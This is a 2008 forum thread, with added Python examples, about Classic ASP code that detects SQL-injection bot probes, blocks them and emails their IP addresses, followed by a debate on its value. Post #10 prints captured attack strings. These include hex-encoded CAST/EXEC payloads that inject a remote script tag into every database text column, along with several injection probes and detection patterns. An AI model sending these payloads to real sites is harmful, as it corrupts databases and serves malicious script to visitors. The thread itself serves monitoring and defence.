ASP Free Forums > Programming > Code Bank
#1  Dr_Rock, May 6th, 2008, 07:53 PM

SQL inject bots be gone

Hey guys,

I have made a pretty neat error reporting function that emails me with any errors that occur on my site, and I am finding daily that the same SQL inject methods are being tried on any page with a query string. Of course they have no chance of doing any damage as I would never send unsanitized data to my SQL server, but why should my bandwidth be wasted on these losers?

So the following code will detect these attempts and send blank pages to these nasty characters; it sets a cookie which can be cleared if the visitor decides they want to behave, and emails their IP to your email account.

Code:
' SITE_EMAIL and TECH_EMAIL are constants defined elsewhere on the site (e.g. an include file)
Dim strPolice, strKey
If Request.Cookies("hacker") = "1" Then
	GoToJail
Else
	' Request.QueryString with no key returns the raw, still URL-encoded query string,
	' so a "+" arrives as "%2B" and a space as "%20". Append the decoded name/value
	' pairs as well so the patterns below match whichever form the bot used.
	strPolice = Request.QueryString
	For Each strKey In Request.QueryString
		strPolice = strPolice & "&" & strKey & "=" & Request.QueryString(strKey)
	Next
	'put any known exploits on the next line (InStr is case-sensitive)
	If InStr(strPolice, "char(124)+user+char(124)") > 0 Or InStr(strPolice, "' and 1=1 and ''='") > 0 Then
		Response.Cookies("hacker") = "1"   ' no Expires, so it lasts until the browser is closed
		Call WhistleBlower(SITE_EMAIL, TECH_EMAIL, "Hack attempt", Request.ServerVariables("REMOTE_ADDR"))
		Response.Redirect("/")
	End If
End If

Sub GoToJail()
	Response.Write("You have been identified as a hacker, please clear your cookies to proceed")
	Response.End
End Sub

Sub WhistleBlower(strSender, strRecipient, strSubject, strBody)
	' Drops the message into the local SMTP service's pickup directory (sendusing = 1)
	Dim objConfig, objMail, objFlds
	Set objConfig = Server.CreateObject("CDO.Configuration")
	Set objFlds = objConfig.Fields
	objFlds("http://schemas.microsoft.com/cdo/configuration/sendusing") = 1
	objFlds("http://schemas.microsoft.com/cdo/configuration/smtpserverpickupdirectory") = "C:\pickup_folder"
	objFlds.Update

	Set objMail = Server.CreateObject("CDO.Message")
	Set objMail.Configuration = objConfig
	objMail.Subject = strSubject
	objMail.From = strSender
	objMail.To = strRecipient
	'objMail.Bcc="someone@somewhere.com"
	objMail.HtmlBody = strBody
	objMail.Send
	Set objMail = Nothing
	Set objConfig = Nothing
End Sub


The "GoToJail()" function can be modified if you want to send some nasty code back their way, but I try to live by the golden rule
Comments on this post
selwonk agrees: Excellent concept!

Last edited by Dr_Rock : May 6th, 2008 at 08:36 PM.

#2  Dr_Rock, June 17th, 2008, 07:41 PM

Updated version (couldn't edit post for some reason)

Code:
' block the hackers that keep trying to get smart
' SITE_EMAIL and TECH_EMAIL are constants defined elsewhere on the site
Dim strPolice
If Request.Cookies("hacker") = "1" Or Session("hacker") = "1" Then
	DenyAccess
Else
	' Raw (still URL-encoded) query string, upper-cased so the checks below are case-insensitive
	strPolice = UCase(Request.QueryString)
	' Debug output is HTML-encoded so the attacker's string is not reflected as markup;
	' writing before the Redirect below only works because response buffering is on (the IIS default)
	If Session("debug") = "on" Then Response.Write(Server.HTMLEncode(strPolice))
	' Note: "EXEC" is a plain substring test and will also fire on harmless words such as "EXECUTIVE"
	If InStr(strPolice, "CHAR(1") > 0 Or InStr(strPolice, "S=CAST") > 0 Or InStr(strPolice, "EXEC") > 0 Then
		Response.Cookies("hacker") = "1"
		Session("hacker") = "1"
		' HTML-encode the attacker-supplied string before it goes into an HTML mail body
		Call SendCDOMail(SITE_EMAIL, TECH_EMAIL, "Hack attempt", Request.ServerVariables("REMOTE_ADDR") & "<br/>" & Server.HTMLEncode(strPolice))
		Response.Redirect("/")
	End If
End If

Sub DenyAccess()
	Response.Write("You have been identified as a hacker, please clear your cookies and open the site in a new window to proceed")
	Response.End
End Sub

Sub SendCDOMail(strSender, strRecipient, strSubject, strBody)
	' Uses the default CDO configuration (local SMTP service) rather than an explicit pickup directory
	Dim objMail
	Set objMail = Server.CreateObject("CDO.Message")
	objMail.Subject = strSubject
	objMail.From = strSender
	objMail.To = strRecipient
	objMail.HtmlBody = strBody
	objMail.Send
	Set objMail = Nothing
End Sub


This one will catch a couple of extra SQL inject methods; it also includes email notification of the hacker's IP address and locks them out for the session.

Last edited by Dr_Rock : June 17th, 2008 at 08:59 PM.
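
As an added example (not code from the thread or from Dr_Rock), here is the substring detection from posts #1 and #2 rewritten in Python so it can be run offline over query strings pulled from a log. It URL-decodes before matching, because Classic ASP's Request.QueryString with no key hands back the still-encoded string: a bot's `+` arrives as `%2B` (see the `char(124)%2Buser%2Bchar(124)` capture later in this thread), so the literal `char(124)+user+char(124)` pattern from post #1 only matches after decoding. The sample query strings are constructed, and the whole-word `EXEC` rule is an addition that shows how to avoid the false positive on ordinary words such as "executive".

```python
"""Detection logic from posts #1 and #2 of this thread, run over sample query strings.

Added example; the sample queries below are constructed, not real captures.
"""
import re
from urllib.parse import unquote

# Substring rules lifted from the two ASP versions, keyed by a short name.
# Matching is done on the lower-cased, URL-decoded query string.
PROBE_PATTERNS = {
    "char124_user": "char(124)+user+char(124)",   # post #1
    "and_1eq1": "' and 1=1 and ''='",             # post #1
    "char_prefix": "char(1",                      # post #2 ("CHAR(1")
    "set_cast": "s=cast",                         # post #2 ("S=CAST")
    "exec": "exec",                               # post #2 ("EXEC")
}

# Tighter alternative to the bare "exec" rule: EXEC/EXECUTE as a whole word only.
SQL_EXEC_RE = re.compile(r"\bexec(?:ute)?\b")


def normalise(raw_query: str) -> str:
    """URL-decode and lower-case, so %2B becomes + and %20 a space."""
    return unquote(raw_query).lower()


def detect_probe(raw_query: str) -> list[str]:
    """Names of every thread pattern found in the query string (empty if clean)."""
    text = normalise(raw_query)
    return [name for name, needle in PROBE_PATTERNS.items() if needle in text]


def is_sql_exec(raw_query: str) -> bool:
    """True only when EXEC appears as a SQL keyword, not inside another word."""
    return SQL_EXEC_RE.search(normalise(raw_query)) is not None


def scan(queries: list[str]) -> dict[str, tuple[list[str], bool]]:
    """Run both checks over a batch, e.g. query strings pulled from IIS logs."""
    return {q: (detect_probe(q), is_sql_exec(q)) for q in queries}


# Constructed sample query strings shaped like the captures in this thread.
SAMPLE_QUERIES = [
    "id=12",
    "q=executive%20summary",
    "id=12;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x53454C4543542031%20AS%20VARCHAR(4000));EXEC(@S);--",
    "name=widget'%20and%20char(124)%2Buser%2Bchar(124)=0%20and%20''='",
    "name=widget'%20and%201=1%20and%20''='",
]

if __name__ == "__main__":
    for query, (hits, keyword_exec) in scan(SAMPLE_QUERIES).items():
        print(f"{query[:60]:60} thread rules={hits} keyword EXEC={keyword_exec}")
```

Running it shows the second sample ("executive summary") tripping the bare `exec` rule while the whole-word rule stays quiet, and the fourth sample matching post #1's `char(124)+user+char(124)` pattern only because the `%2B` was decoded first.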

#3  baseballdude_, June 19th, 2008, 10:46 PM
If your website contains forms or stores data in cookies, you might consider checking Request.Form() and Request.Cookies() along with Request.QueryString().
Comments on this post
Dr_Rock agrees: Valid point, my pages don't accept any form values without heavy validation, and I never use cookies in queries

#4  Memnoch, June 19th, 2008, 11:34 PM
What prevents someone from changing the "hacker" cookie to a value other than "1"?

#5  Dr_Rock, June 19th, 2008, 11:40 PM

Quote:
Originally Posted by Memnoch
What prevents someone from changing the "hacker" cookie to a value other then "1"?


Hence the Session("hacker"). The idea is that if, by some far-out circumstance, the request is valid or accidental, the user can clear their cookie and open a new window and continue to use the site; if they have to do that every time they send nasty code then it is going to be a slow process... and since it catches each request, completely fruitless.

The point of this is not to stop injection, this is taken care of by good programming techniques in the rest of the site, it is to monitor this kind of activity and to conserve bandwidth if your site happens to get targeted by aggressive inject bots which hit up every single page it can find with a query string.

Some days mine can get hit with 200+ malicious requests (multiple rank 1 Google keywords); times that by 100k per page and that's 20MB down the gurgler a day.

Last edited by Dr_Rock : June 22nd, 2008 at 07:21 PM. Reason: said 500k per page, may have been a bit of an exaggeration

#6  Memnoch, June 23rd, 2008, 12:33 PM
My initial thought is this "hacker" blocking isn't even needed if proper whitelisting techniques are in place, along with proper client-side and server-side validation.

Additionally, what parts of the request are being validated for malicious content?

- Form inputs
- Querystring values
- Cookie values
- Header values
etc...

I think someone who doesn't know about security would try to implement this and get a false sense of security, thinking their application was protected from hackers, which isn't the case.

I admire your desire to create something to notify developers of potential attacks, but anything done after the fact is just a band-aid. Closing the barn doors after all the animals have gone.

What developers really need to know, learn and do is proper input validation. Implementation of proper whitelisting techniques will go miles further than a band-aid implemented after the fact that's meant to supplement the insecure code they've written.
Comments on this post
Dr_Rock agrees: Totally missing the point of the script but the advice is sound

Last edited by Memnoch : June 23rd, 2008 at 12:38 PM.

#7  baseballdude_, June 23rd, 2008, 06:18 PM
First, I definitely agree.

However, once all aforementioned security measures are properly put in place, it is sometimes necessary to implement further security measures like this one JUST in case.

The problem usually lies in the fact that old code (like in my case) was written before people knew as much as they do now. The old programmer of one of the websites I work on left me some pretty sloppy code and I'm not able to just go through and rewrite the entire website due to the sheer volume of scripts. In my case, something like this IS necessary, although admittedly very sloppy.
Comments on this post
Dr_Rock agrees: GUYS!!! This is not a validation/sanitation script! It is to monitor and conserve bandwidth only!!! The security it adds is just a bonus...

#8  Memnoch, June 23rd, 2008, 07:42 PM
I agree it would be beneficial as a logging utility to identify malicious requests and track where they came from. It could also be used as a nice tool to identify various types of attacks a hacker might use.

I don't agree it should be used as any type of tool to prevent a hacker attack.

#9  Dr_Rock, June 23rd, 2008, 08:07 PM

Good that we have that cleared up. Now, just to make sure the concept of this program is clear as crystal, I will list the intended functions in point form and in order of priority.
  1. Block data from being sent to non-genuine users, thus reducing unnecessary bandwidth usage
  2. Monitor methods, sources and frequency of attacks
  3. Stop some malicious requests before they reach your code

This script DOES NOT do the following:
  1. Does not block all possible query string attacks
  2. Does not block request form attacks
  3. Does not block cookie manipulation
  4. Does not block header manipulation
  5. Does not block cross site scripting
  6. Is not to be used as a primary security measure

#10  Dr_Rock, June 23rd, 2008, 08:25 PM

Some examples of attacks that are being blocked!

I post this knowing the risk of breaking the forum, but I assume it's all up to scratch security-wise...

Here are some examples of attacks that I have successfully collected:

Code:
;SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E63686B6164772E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);--


Code:
;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E63686B6164772E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);--


Code:
;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x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


Code:
'%20and%20char(124)%2Buser%2Bchar(124)=0%20and%20''='


Code:
' and 1=1 and ''='


Code:
OR 0 IN (SELECT TOP 1 CHAR(60) CHAR(122) CHAR(122) CHAR(104) CHAR(110) CHAR(107) CHAR(99) CHAR(119) CHAR(102) CHAR(62) COALESCE(CAST(0 AS VARCHAR(8000)),SPACE(0)) CHAR(60) CHAR(113) CHAR(100) CHAR(117) CHAR(116) CHAR(117) CHAR(115) CHAR(119) CHAR(98) CHAR(62)) OR 0 IN (SELECT CHAR(60) CHAR(122) CHAR(120) CHAR(107) CHAR(114) CHAR(108) CHAR(122) CHAR(105) CHAR(113) CHAR(62))--D1855E


Many, many more in the list that these came from...
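
The `CAST(0x... AS VARCHAR(4000))` captures above hide the injected statement inside a hex blob, which is what lets them slip past a naive keyword filter (nothing but `SET`, `CAST` and `EXEC` is visible in clear). The following is an added example, not code from the thread or from Dr_Rock, that URL-decodes a captured query string, pulls out every such CAST, strips the whitespace a forum or log viewer may have inserted when wrapping the hex, and decodes it, treating `NVARCHAR` blobs as UTF-16LE and `VARCHAR` blobs as single-byte text. The two sample query strings are constructed: they keep the wrapper from the captures above but encode short harmless statements in place of the real cursor loop.

```python
"""Decode CAST(0x... AS [N]VARCHAR(n)) payloads like the ones captured above.

Added example, not code from the thread. The two sample query strings are
constructed: same wrapper as the thread's captures, but a short harmless
statement in place of the real hex blob.
"""
import re
from urllib.parse import unquote

# The hex blob may contain whitespace where a forum or log viewer wrapped it.
CAST_RE = re.compile(
    r"CAST\(\s*0x([0-9A-Fa-f\s]+?)\s*AS\s+(N?VARCHAR)\s*\(\s*\d+\s*\)\s*\)",
    re.IGNORECASE,
)


def decode_cast_payloads(raw_query: str) -> list[str]:
    """Return the SQL hidden in every CAST(0x... AS [N]VARCHAR(n)) in a query string."""
    text = unquote(raw_query)
    decoded = []
    for hex_blob, sql_type in CAST_RE.findall(text):
        clean = "".join(hex_blob.split())        # strip line-wrap whitespace
        if len(clean) % 2:                        # odd length: not valid hex, skip it
            continue
        data = bytes.fromhex(clean)
        # VARCHAR is one byte per character; NVARCHAR is UTF-16LE, two bytes per character.
        encoding = "utf-16-le" if sql_type.upper() == "NVARCHAR" else "latin-1"
        decoded.append(data.decode(encoding, errors="replace"))
    return decoded


SAMPLE_QUERIES = [  # constructed; the CAST blobs encode "SELECT 1" and "DROP TABLE t"
    ";DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x53454C4543542031%20AS%20VARCHAR(4000));EXEC(@S);--",
    ";DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x440052004F0050002000  540041004200  "
    "4C00450020007400%20AS%20NVARCHAR(4000));EXEC(@S);--",
]

if __name__ == "__main__":
    for query in SAMPLE_QUERIES:
        print(decode_cast_payloads(query))
```

Feeding the decoder a real capture from a log is the quickest way to see what a given bot wave is actually trying to do (the two full captures above unpack to a cursor loop over every text column in the database), which is the "monitor methods" goal Dr_Rock lists for the script.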
